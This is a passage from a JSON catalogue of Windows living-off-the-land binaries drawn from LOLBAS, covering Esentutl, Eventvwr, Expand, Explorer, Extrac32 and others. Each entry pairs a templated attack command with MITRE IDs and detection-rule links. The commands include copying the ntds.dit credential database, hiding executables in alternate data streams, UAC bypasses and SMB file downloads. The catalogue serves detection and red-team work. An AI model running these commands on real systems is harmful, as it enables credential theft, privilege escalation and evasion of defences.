file.","usecase":"Copies files from A to B","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:1","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o","description":"Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.","usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:2","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o","description":"Copies the source Alternate Data Stream (ADS) to the destination EXE.","usecase":"Extract hidden file within alternate data streams","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:3","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o","description":"Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.","usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:4","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o","description":"Copies the source EXE to the destination EXE file","usecase":"Use to copy files from one unc path to another","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:5","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d {PATH_ABSOLUTE:.dit}","description":"Copies a (locked) file using Volume Shadow Copy","usecase":"Copy/extract a locked file such as the AD Database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:eudcedit-exe:0","toolId":"lolbas:eudcedit-exe","toolName":"Eudcedit.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"eudcedit","description":"Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option \"Link with Selected Fonts\" and click on Save As, then in the opened enter the command you want to execute.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"admin","fullPath":["c:\\windows\\system32\\eudcedit.exe","c:\\windows\\syswow64\\eudcedit.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Processes spawned by eudcedit.exe."}],"references":["https://medium.com/@matanb707/windows-fonts-exploitation-in-2025-bypassing-uac-with-eudcedit-915599705639","https://lolbas-project.github.io/lolbas/Binaries/Eudcedit/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:eventvwr-exe:0","toolId":"lolbas:eventvwr-exe","toolName":"Eventvwr.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"eventvwr.exe","description":"During startup, eventvwr.exe checks the registry value `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml"},{"type":"IOC","value":"eventvwr.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"}],"references":["https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/","https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1","https://twitter.com/orange_8361/status/1518970259868626944","https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:eventvwr-exe:1","toolId":"lolbas:eventvwr-exe","toolName":"Eventvwr.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c \"{CMD}\" > RecentViews & copy RecentViews %LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews & eventvwr.exe","description":"During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net","usecase":"Execute a command to bypass security restrictions that limit the use of command-line interpreters.","mitre":["T1548.002"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml"},{"type":"IOC","value":"eventvwr.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"}],"references":["https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/","https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1","https://twitter.com/orange_8361/status/1518970259868626944","https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:expand-exe:0","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}","description":"Copies source file to destination.","usecase":"Use to copies the source file to the destination file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:expand-exe:1","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}","description":"Copies source file to destination.","usecase":"Copies files from A to B","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:expand-exe:2","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat","description":"Copies source file to destination Alternate Data Stream (ADS)","usecase":"Copies files from A to B","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:explorer-exe:0","toolId":"lolbas:explorer-exe","toolName":"Explorer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"explorer.exe /root,\"{PATH_ABSOLUTE:.exe}\"","description":"Execute specified .exe with the parent process spawning from a new instance of explorer.exe","usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml"},{"type":"IOC","value":"Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious."}],"references":["https://twitter.com/CyberRaiju/status/1273597319322058752?s=20","https://twitter.com/bohops/status/1276356245541335048","https://twitter.com/bohops/status/986984122563391488","https://lolbas-project.github.io/lolbas/Binaries/Explorer/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:explorer-exe:1","toolId":"lolbas:explorer-exe","toolName":"Explorer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"explorer.exe {PATH_ABSOLUTE:.exe}","description":"Execute notepad.exe with the parent process spawning from a new instance of explorer.exe","usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml"},{"type":"IOC","value":"Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious."}],"references":["https://twitter.com/CyberRaiju/status/1273597319322058752?s=20","https://twitter.com/bohops/status/1276356245541335048","https://twitter.com/bohops/status/986984122563391488","https://lolbas-project.github.io/lolbas/Binaries/Explorer/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:extexport-exe:0","toolId":"lolbas:extexport-exe","toolName":"Extexport.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Extexport.exe {PATH_ABSOLUTE:folder} foo bar","description":"Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.","usecase":"Execute dll file","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Internet Explorer\\Extexport.exe","C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml"},{"type":"IOC","value":"Extexport.exe loads dll and is execute from other folder the original path"}],"references":["http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Extexport/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:extrac32-exe:0","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe","description":"Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.","usecase":"Extract data from cab file and hide it in an alternate data stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:extrac32-exe:1","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe","description":"Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.","usecase":"Extract data from cab file and hide it in an alternate data stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:extrac32-exe:2","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}","description":"Copy the source file to the destination file and overwrite it.","usecase":"Download file from UNC/WEBDav","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 